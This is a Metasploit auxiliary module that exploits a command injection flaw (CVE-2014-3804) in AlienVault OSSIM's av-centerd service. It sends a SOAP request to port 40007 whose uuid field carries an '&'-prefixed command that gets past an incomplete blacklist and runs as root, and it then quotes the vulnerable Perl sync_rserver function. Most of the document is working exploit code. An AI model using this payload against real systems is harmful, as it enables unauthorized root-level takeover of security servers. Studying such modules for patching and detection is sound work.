Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution

`require 'msf/core'  
  
class MetasploitModule < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize  
super(  
'Name' => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',  
'Description' => %q{  
This module exploits a command injection vulnerability found within the sync_rserver  
function in Util.pm. The vulnerability is triggered due to an incomplete blacklist  
during the parsing of the $uuid parameter. This allows for the escaping of a system  
command allowing for arbitrary command execution as root  
},  
'References' =>  
[  
[ 'CVE', '2014-3804' ],  
[ 'ZDI', '14-197' ],  
[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],  
],  
'Author' => [ 'james fitts' ],  
'License' => MSF_LICENSE,  
'DisclosureDate' => 'Jun 11 2014')  
  
register_options([  
Opt::RPORT(40007),  
OptBool.new('SSL', [true, 'Use SSL', true]),  
OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])  
], self.class)  
  
end  
  
def run  
  
soap = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"  
soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"  
soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"  
soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"  
soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"  
soap += "<soap:Body>\r\n"  
soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n"  
soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"  
soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n"  
soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"  
soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"  
soap += "</sync_rserver>\r\n"  
soap += "</soap:Body>\r\n"  
soap += "</soap:Envelope>\r\n"  
  
res = send_request_cgi(  
{  
'uri' => '/av-centerd',  
'method' => 'POST',  
'ctype' => 'text/xml; charset=UTF-8',  
'data' => soap,  
'headers' => {  
'SOAPAction' => "\"AV/CC/Util#sync_rserver\""  
}  
}, 20)  
  
if res && res.code == 200  
print_good("Command executed successfully!")  
else  
print_bad("Something went wrong...")  
end  
  
end  
  
end  
__END__  
  
/usr/share/alienvault-center/lib/AV/CC/Util.pm  
  
sub sync_rserver  
{  
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;  
verbose_log_file(  
"SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"  
);  
  
if ($uuid =~ /[;`\$\<\>\|]/) {  
console_log_file("Not allowed uuid: $uuid in sync_rserver\n");  
my @ret = ("Error");  
return \@ret;  
}  
  
my $conn = Avtools::get_database();  
my $sqlfile = "/tmp/sync_${uuid}.sql";  
my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";  
my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;  
my $sqlfile_content;  
my $status = 1;  
my $counter = 0;  
my @ret;  
my $query = qq{};  
my $dbq;  
  
if ( -f $sqlfile_old )  
{  
my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;  
debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");  
if ( $sqlfile_md5 eq $sqlfile_old_md5 )  
{  
unlink $sqlfile;  
verbose_log_file ("Already sync'ed!");  
return "0";  
}  
else  
{  
unlink $sqlfile_old;  
}  
}  
  
my $query_array = `ossim-db < $sqlfile 2>&1`;  
$query_array =~ s/[\s\n]+$//g;  
if ($query_array ne '')  
{  
$status = $query_array;  
}  
else  
{  
$status = 0;  
}  
  
if ( ! (defined $status) or $status == 0 )  
{  
if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )  
{  
verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");  
system('/etc/init.d/ossim-server restart');  
}  
else  
{  
debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");  
}  
  
$query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};  
debug_log_file($query);  
$dbq = $conn->prepare($query);  
$dbq->execute();  
$dbq->finish();  
}  
else  
{  
verbose_log_file ("Error syncing rservers: ${status}");  
}  
  
debug_log_file("Move file: $sqlfile");  
move ($sqlfile, $sqlfile . ".old");  
  
# push @ret, "0";  
return "0";  
}  
  
`